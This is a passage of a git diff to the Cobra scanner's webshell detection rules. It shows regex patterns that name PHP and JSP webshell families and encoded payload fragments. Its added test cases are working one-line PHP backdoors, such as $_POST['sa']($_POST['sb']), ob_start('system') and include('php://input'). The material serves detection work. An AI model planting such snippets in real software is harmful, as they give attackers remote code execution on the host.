\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) ]]></match> <level value="7"/> <test> diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index fa367b59..4ef70460 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell14"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index 44633e23..df9048ae 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell15"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\( - ]]></match> + <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml index c6908308..0daa4f57 100644 --- a/rules/CVI-360016.xml +++ b/rules/CVI-360016.xml @@ -2,12 +2,11 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell16"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));]]></case> + <case assert="true"><![CDATA[filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index 4b6e320d..72325724 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml @@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell17"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1 - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|.*['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\s*\(.*FILTER_CALLBACK[^;]*\$\1]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $op=array('options' => 'assert'); + filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml index d4cd189f..ae017365 100644 --- a/rules/CVI-360018.xml +++ b/rules/CVI-360018.xml @@ -2,12 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell18"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\s*(mb_ereg_replace|mb_eregi_replace)\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\)]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[mb_ereg_replace('.*', $_REQUEST['op'], '', 'e');]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index e89fb879..6d8df0af 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml @@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell19"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1 - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\s*\((.*,){3}\s*\$\1]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $e = "\ise"; + $data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index cba0ee2d..7e110ed8 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell22"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + ini_set('allow_url_include, 1'); + include('php://input'); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml index 4ae30c28..ee83be9c 100644 --- a/rules/CVI-360023.xml +++ b/rules/CVI-360023.xml @@ -2,13 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell23"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php - ]]></match> + <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match> <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml index bc678fdc..14a7e530 100644 --- a/rules/CVI-360024.xml +++ b/rules/CVI-360024.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell24"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\); - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml index 57d67a92..a88c4111 100644 --- a/rules/CVI-360025.xml +++ b/rules/CVI-360025.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell25"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\)]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml index e1abf535..e8d8ef15 100644 --- a/rules/CVI-360026.xml +++ b/rules/CVI-360026.xml @@ -2,12 +2,27 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell26"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)) - ]]></match> + <match mode="regex-only-match"><![CDATA[ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $cb= 'system'; + ob_start($cb); + echo $_GET[c]; + ob_end_flush(); + ]]></case> + <case assert="true"><![CDATA[ + $evalstr=""; + ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); + echo $_REQUEST['pass']; + ob_end_flush(); + assert($evalstr); + ]]></case> + <case assert="true"><![CDATA[ + ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); + echo $_REQUEST['pass']; + ob_end_flush(); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index df73e949..61dd65ef 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell27"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\() - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\()]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml index 76131cdf..ee59faee 100644 --- a/rules/CVI-360028.xml +++ b/rules/CVI-360028.xml @@ -2,12 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell28"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass - ]]></match> + <match mode="regex-only-match"><![CDATA[eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index f6f8467e..265c9dbc 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml @@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell29"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se - ]]></match> + <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index 3d44e938..2ac9f909 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml @@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell30"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c - ]]></match> + <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index 87d64654..2b43470f 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml @@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell31"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\) - ]]></match> + <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index db6f822e..5a32e9df 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,13 +1,9 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell32"/> + <name value="webshell"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" - ]]> + Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]> - - ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 5b136bd9..9f77cf83 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,9 @@ - + - |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD - ]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml index 76ee617f..ef937b79 100644 --- a/rules/CVI-360034.xml +++ b/rules/CVI-360034.xml @@ -2,11 +2,24 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell34"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*]]></match> <level value="7"/> <test> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb']);]]></case> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb'],$_POST['sc']);]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sa($_POST['sb']); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sb = $_POST['sb']; + $sa($sb); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $_POST($sa ); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml deleted file mode 100644 index 793f69f4..00000000 --- a/rules/CVI-360035.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="str_pattern"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - \bJFolder|\bwebshell|\bvonloesch\.de|reDuh\.jsp|QQ:179189585|JSP\s*文件管理器|\bJSPSpy|\bKJ021320 - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml deleted file mode 100644 index eac29429..00000000 --- a/rules/CVI-360036.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="exec_cmd"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (?:(?:java\.lang\.)?Runtime)?\s*(\w+)\s*=\s*(?:java\.lang\.)?Runtime\.getRuntime\(\)[\s\S]*\1\.exec\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml deleted file mode 100644 index aa5482c7..00000000 --- a/rules/CVI-360037.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="exec_cmd2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.io\.)?ProcessBuilder\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git 